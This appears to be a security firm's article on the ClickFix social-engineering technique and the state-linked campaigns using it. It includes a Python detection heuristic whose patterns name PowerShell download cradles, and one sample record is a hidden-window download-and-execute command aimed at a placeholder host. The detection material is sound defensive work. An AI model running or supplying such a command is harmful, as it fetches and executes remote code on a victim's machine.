Zettawise Cyber Range focuses on assessing the vulnerabilities involved in the process safety, system reliability and physical reliability of the Operational Technology of Critical Infrastructures.


Zettawise Consulting is a part of the joint workforce of SASTRA (RRU, Ministry of Home Affairs, Govt of India) under the aegis of “AtmaNirbhar and AtmaSurakshit Bharat Mission” of Govt of India.

State-sponsored hacking groups from North Korea, Iran, and Russia are increasingly using a stealthy social-engineering technique called ClickFix, favored for its effectiveness and its ability to evade detection.

Through ClickFix, attackers craft convincing fake sites that resemble real software or file-sharing portals. A bogus error message tells the user that a download has failed and instructs them to "fix" the issue by copying and running a command-line or PowerShell script. The victim, not an exploit, launches the payload, so the user effectively installs the malware themselves.
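The execution pattern described above leaves a recognisable trace in endpoint telemetry: a PowerShell process started from an interactive parent, whose command line hides its window and pulls a second stage from the network. The following Python heuristic is an added example, not the article's own material nor anything from the Proofpoint or Microsoft reports it cites. It assumes process-creation records with parent image, image and full command line (constructed field names), assumes that a command pasted into the Windows Run dialog appears with explorer.exe as its parent, and scores constructed sample records whose host name is the placeholder example.invalid.

```python
"""Heuristic scoring of process-creation events for ClickFix-style execution.

Added example, not material from the Zettawise article or from the
Proofpoint/Microsoft reports it cites. It assumes endpoint telemetry that
records, for each new process, the parent image, the image, and the full
command line (field names here are constructed). It also assumes, as a
heuristic, that a command pasted into the Windows Run dialog shows up with
explorer.exe as the parent process.
"""
import re
from dataclasses import dataclass

# Individually weak indicators; the score counts how many co-occur.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_COMMAND = re.compile(
    r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE
)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:DownloadString|Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl)\b",
    re.IGNORECASE,
)
INVOKE_EXPRESSION = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)

SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumed parent for a user-pasted Run-dialog command.
INTERACTIVE_PARENTS = {"explorer.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def score_event(ev: ProcessEvent) -> int:
    """Return a 0..5 suspicion score; non-PowerShell images always score 0."""
    if ev.image.lower() not in SHELL_IMAGES:
        return 0
    score = 1 if ev.parent_image.lower() in INTERACTIVE_PARENTS else 0
    for pattern in (HIDDEN_WINDOW, ENCODED_COMMAND, DOWNLOAD_CRADLE, INVOKE_EXPRESSION):
        if pattern.search(ev.command_line):
            score += 1
    return score


def flag_clickfix(events, threshold: int = 3):
    """Return the events whose score reaches the threshold."""
    return [ev for ev in events if score_event(ev) >= threshold]


# Constructed sample records; the host example.invalid is a placeholder.
SAMPLE_EVENTS = [
    # Pasted from a fake "download failed" page: hidden window, download, IEX.
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (iwr http://example.invalid/fix)"'),
    # Routine admin script launched from a console.
    ProcessEvent("cmd.exe", "powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    # User simply opened an interactive PowerShell window.
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    # Scheduled task with an encoded command but no other indicators.
    ProcessEvent("svchost.exe", "powershell.exe",
                 "powershell.exe -NoProfile -EncodedCommand "
                 "QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA="),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev), ev.parent_image, "->", ev.command_line)
    print("flagged:", [ev.command_line for ev in flag_clickfix(SAMPLE_EVENTS)])
```

The threshold of three keeps an interactively opened console (score 1) and a scheduled encoded task (score 1) below the alert line, while the pasted command scores 4 because the interactive parent, the hidden window, the download cradle and the in-memory invocation all co-occur. Tune the parent set and threshold to the telemetry source actually in use before relying on the rule.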

A new report from cybersecurity firm Proofpoint reveals a sharp rise in the use of ClickFix between late 2024 and early 2025. Among the threat actors adopting the technique are well-known APT groups such as Kimsuky (North Korea), MuddyWater (Iran), APT28, and a newly identified Russian-linked actor dubbed UNK_RemoteRogue. 

Kimsuky, a North Korean APT group, ran a phishing campaign against Korean policy think tanks using emails that spoofed Japanese diplomats. Victims were led to fake secure-drive sites and prompted to run a PowerShell command presented as device registration, which quietly deployed QuasarRAT while decoy documents kept suspicion at bay.

MuddyWater, the Iranian cyber-espionage group, struck again in late 2024 with a phishing campaign that spoofed Microsoft and reached 39 Middle Eastern entities. Disguised as a critical update, the PowerShell script actually installed 'Level', a stealthy tool used to spy on systems and steal sensitive data.

UNK_RemoteRogue, a Russia-affiliated threat actor, ran a December 2024 phishing campaign against defense-related firms. Exploiting compromised Zimbra email servers, it redirected users to phony Microsoft Word sites, complete with a YouTube tutorial, that tricked them into running PowerShell scripts tied to Empire command-and-control (C2) infrastructure.

Microsoft Joins Forces with Experts to Address the Threat  

Previously, Microsoft’s Threat Intelligence division sounded the alarm on ClickFix’s use by Kimsuky, calling for increased international vigilance. 

Experts in the field urge users to take the following steps: 
  • Always verify commands before executing them from emails or websites.
  • Never run scripts from unfamiliar sources in your terminal or PowerShell window.
  • Verify the sender's email, domain name, and writing quality to detect phishing attempts.